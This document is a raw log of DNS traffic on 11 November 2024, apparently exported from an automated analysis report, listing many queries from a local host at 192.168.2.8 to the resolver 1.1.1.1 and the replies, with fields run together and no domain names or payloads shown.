                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618273973 CET6458353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618457079 CET5537453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618906975 CET6116453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.619856119 CET5949353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.619908094 CET6466053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.620347023 CET53506611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.621014118 CET53539311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.622823954 CET6383153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.624831915 CET53494041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.627496958 CET53625211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.627511024 CET53645611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.629715919 CET53646601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.629890919 CET53645831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.630012989 CET53594931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.633435965 CET53638311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.633480072 CET5656753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634042978 CET5609353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634229898 CET5077253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634382963 CET4975353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.635385990 CET6178053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.635750055 CET5466553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.636029005 CET5679853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.637082100 CET53553741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.638153076 CET5813453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.639739990 CET5915953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.640899897 CET53512211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.641475916 CET53518381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.641870975 CET53611641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.643856049 CET53497531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.645298004 CET53589531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.645343065 CET53546651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.646018982 CET53507721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.646032095 CET53617801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.646502018 CET53567981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.646735907 CET53599731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.647371054 CET53565671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.647794008 CET53581341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.650679111 CET53591591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.653188944 CET6522753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656071901 CET6129553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656250000 CET5876553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656399012 CET5920453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656564951 CET6286453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656717062 CET5726353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656852961 CET6401753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656980991 CET5879553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.657118082 CET5446453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.657239914 CET6403253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.658370018 CET6187453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.663795948 CET53652271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.663813114 CET53592041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.665806055 CET53640171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.665822983 CET53560931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.666722059 CET53572631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.666738033 CET53544641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.666915894 CET53628641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.666927099 CET53612951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.666968107 CET53587951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.667356014 CET53587651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.668220997 CET53640321.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.674122095 CET5238353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.676533937 CET53618741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.681726933 CET53523831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.031740904 CET5566453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.041503906 CET53556641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.045677900 CET6054853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.047188044 CET5493653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.053483963 CET53605481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.058325052 CET53549361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.063196898 CET5730253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.094424009 CET53573021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.133205891 CET5267753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.146060944 CET53526771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.158827066 CET5092953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.168905020 CET53509291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.296459913 CET6193253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.298794031 CET5410553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.298990965 CET5559053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.299664974 CET5639753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.300059080 CET6406853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.300412893 CET5258053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.300710917 CET6048453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.301265955 CET6551853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.301717043 CET6125453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.306391001 CET53619321.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.308368921 CET53604841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.308898926 CET53555901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.308907032 CET53541051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.310574055 CET53525801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.311507940 CET53612541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.320455074 CET5734653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.321247101 CET6185853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.322180033 CET5206553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.323142052 CET5008453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.325608015 CET6405753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.326273918 CET6254953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.327100039 CET6389853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.327898026 CET5183753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.329479933 CET5942653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.330020905 CET53573461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.330319881 CET5640253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.330342054 CET53500841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.330636024 CET53563971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.331394911 CET6147953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.331990004 CET53655181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.332026958 CET53618581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.332532883 CET53640681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.332890987 CET53520651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.335218906 CET53625491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.335577965 CET53640571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.336751938 CET53638981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.340070963 CET53518371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.345808029 CET6093153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.346039057 CET5768553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.349245071 CET5231953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.350320101 CET53564021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.358503103 CET5968553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.359515905 CET53523191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.359890938 CET5985653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360090017 CET4916753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360361099 CET6057853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360606909 CET5779853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360871077 CET5800953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360905886 CET6210353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.361124992 CET53594261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.361479998 CET5728553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.363713980 CET53614791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.369472980 CET5087053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.369641066 CET5870853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.369798899 CET6411153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370033979 CET53598561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370219946 CET5583653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370394945 CET53605781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370455980 CET6042953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370502949 CET5768653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370642900 CET5665353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.371402025 CET6198653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.371576071 CET6402353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.371768951 CET53577981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.371871948 CET53491671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.375849962 CET5854053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.376245975 CET6252553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377041101 CET6028553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377204895 CET6244653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377345085 CET53609311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377443075 CET5886753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377599955 CET5323053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378231049 CET5449153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378700018 CET6372853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378881931 CET5115153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378997087 CET53576851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.379050016 CET6148153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.379343987 CET53587081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.379371881 CET6435053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.379383087 CET6216353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.379877090 CET53604291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.380131006 CET53558361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.380711079 CET53566531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.380920887 CET53508701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.381311893 CET53619861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.381973982 CET53640231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.382416964 CET53576861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.385459900 CET53585401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.386431932 CET6464253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.386737108 CET53532301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.387326002 CET53602851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.387768984 CET53624461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.388056993 CET5874953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.388432026 CET53614811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.388756990 CET53544911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.390011072 CET53643501.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.390017033 CET53511511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.390042067 CET53596851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.391680956 CET53621031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.392571926 CET53580091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.393285036 CET53646421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.393987894 CET53572851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.396410942 CET53587491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.400191069 CET6470853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.400224924 CET53641111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.400361061 CET5412353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.401598930 CET5098953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.408062935 CET53625251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.408691883 CET53637281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.409491062 CET53588671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.411817074 CET53509891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.413980961 CET53621631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.431396961 CET53541231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.434123039 CET53647081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.535883904 CET5228753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.546895027 CET53522871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.584309101 CET5046853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.585575104 CET6040253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.592622995 CET5930153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.594341993 CET53504681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.596405029 CET6254853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.604022026 CET53593011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.607515097 CET53625481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.616463900 CET6234453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.618804932 CET53604021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.634567976 CET6370753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.642777920 CET5272353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.647037983 CET53623441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.648323059 CET5941253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.652713060 CET53637071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.653552055 CET53527231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.657454967 CET5054453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.657757044 CET53594121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.658436060 CET6145853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.668212891 CET53505441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.669138908 CET53614581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.712241888 CET6398253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.716012955 CET5836453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.721611977 CET53639821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.735788107 CET6536253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.746380091 CET53653621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.747705936 CET53583641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.774337053 CET5483653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.776078939 CET5525353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.778621912 CET5190053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.785068035 CET53548361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.786974907 CET53552531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.810524940 CET53519001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823117018 CET5826953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823302031 CET6124453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823525906 CET5852453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823684931 CET5677853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.832861900 CET53585241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.833120108 CET53582691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.838537931 CET5810753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.849483013 CET6042953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.850912094 CET5176053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.851237059 CET5426953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.852354050 CET6129653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.852752924 CET6510053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.853514910 CET5967653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854079962 CET5277453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854298115 CET6518453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854548931 CET6278953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854732990 CET5455353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854882956 CET5781053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855030060 CET6061753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855202913 CET6231053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855319023 CET53612441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855483055 CET53567781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855571985 CET5330453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.856885910 CET6260053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.859375954 CET53604291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.861169100 CET53517601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.861226082 CET53542691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.863531113 CET53651001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.864789009 CET53545531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.864881039 CET53623101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.864893913 CET53527741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.865708113 CET53612961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.865720034 CET53596761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.865731955 CET53606171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.866131067 CET53533041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.867688894 CET53626001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.870975971 CET53581071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.879204035 CET53651841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.885035038 CET53627891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.886975050 CET53578101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.898762941 CET5738453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.898947001 CET5983353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.903695107 CET5153453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.903711081 CET5884153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.904151917 CET5899453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.906656027 CET53573841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.907557964 CET6321353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.908613920 CET5370853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.909025908 CET6280553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.909292936 CET6220653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.909851074 CET5247253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.910300016 CET6033753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.910630941 CET5694653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.911268950 CET5966153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.911839962 CET5810953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.912384987 CET5086953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.913115025 CET5289253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.914796114 CET53588411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.915360928 CET53515341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.916714907 CET53537081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.916728020 CET53628051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.917375088 CET6300953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.921679974 CET53581091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.921708107 CET53603371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.921742916 CET53508691.1.1.1192.168.2.8
